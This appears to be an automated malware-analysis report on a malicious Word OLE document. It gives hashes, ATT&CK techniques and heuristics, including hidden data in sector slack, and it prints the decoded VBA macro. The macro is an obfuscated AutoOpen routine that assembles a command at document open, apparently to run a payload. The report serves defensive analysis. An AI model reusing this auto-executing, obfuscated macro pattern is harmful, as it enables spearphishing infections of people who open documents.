Office (OLE) malware analysis — malicious · 498cf8d663810f51

MALICIOUS

Office (OLE)

69.2 KB First seen: 2019-05-16

MD5: 8bffb9cc78ab4425cf7e85cc5a76e416 SHA-1: 3b46bca0e180cbda3a24d01c249b7bb4ddbb29a2 SHA-256: 498cf8d663810f515e0cc1600c88f8f3fcbefa468bb070e128db4444f1bb12f2

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing VBA macros, specifically an AutoOpen macro, which is a common technique for initial execution. The AutoOpen macro appears to construct and execute a command, likely to download and run a secondary payload. The presence of an embedded URL heuristic further supports this, although the URL itself was confirmed benign.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 70,869 bytes but its declared streams total only 36,395 bytes — 34,474 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 801 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	801 bytes
SHA-256: `2bf2626032fa22be7e13f6067792af2dd50644a9b020cc75b97c5feee1e88de7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZIhIpmj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() If ozvjrE Xor GtljZ Then wauzF = "OCFSwJ" End If If pmJTl <= 12 Then ALJWOw = "kNRVZf" End If If pdoLt = shwdrl Then umfnIY = "DBpGtYXJbwiSEY" End If If Hstwwk >= mChjq Then irztwI = "YkjSCRR" End If jmHtqvtib (KeyString(mVWBG + hwZbkZU + 17 + 19 + 31 + vwIkQY + wdpow) + BJmAnzj + dcXoWj + KeyString(jEdjFZlN + Ddquka + 20 + 21 + 36 + bnUwULi + oAvlO) + wmwaJ + morOjcjH + bOfhVCUKH + fkwzPzSQ + qwnOItzK) If hRVPjG <= wZjJh Then mIXczn = "Wp" End If End Sub

SHA-256: 2bf2626032fa22be7e13f6067792af2dd50644a9b020cc75b97c5feee1e88de7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZIhIpmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If ozvjrE Xor GtljZ Then

wauzF = "OCFSwJ"
End If
   If pmJTl <= 12 Then

ALJWOw = "kNRVZf"
End If
   If pdoLt = shwdrl Then

umfnIY = "DBpGtYXJbwiSEY"
End If
   If Hstwwk >= mChjq Then

irztwI = "YkjSCRR"
End If
jmHtqvtib (KeyString(mVWBG + hwZbkZU + 17 + 19 + 31 + vwIkQY + wdpow) + BJmAnzj + dcXoWj + KeyString(jEdjFZlN + Ddquka + 20 + 21 + 36 + bnUwULi + oAvlO) + wmwaJ + morOjcjH + bOfhVCUKH + fkwzPzSQ + qwnOItzK)
   If hRVPjG <= wZjJh Then

mIXczn = "Wp"
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.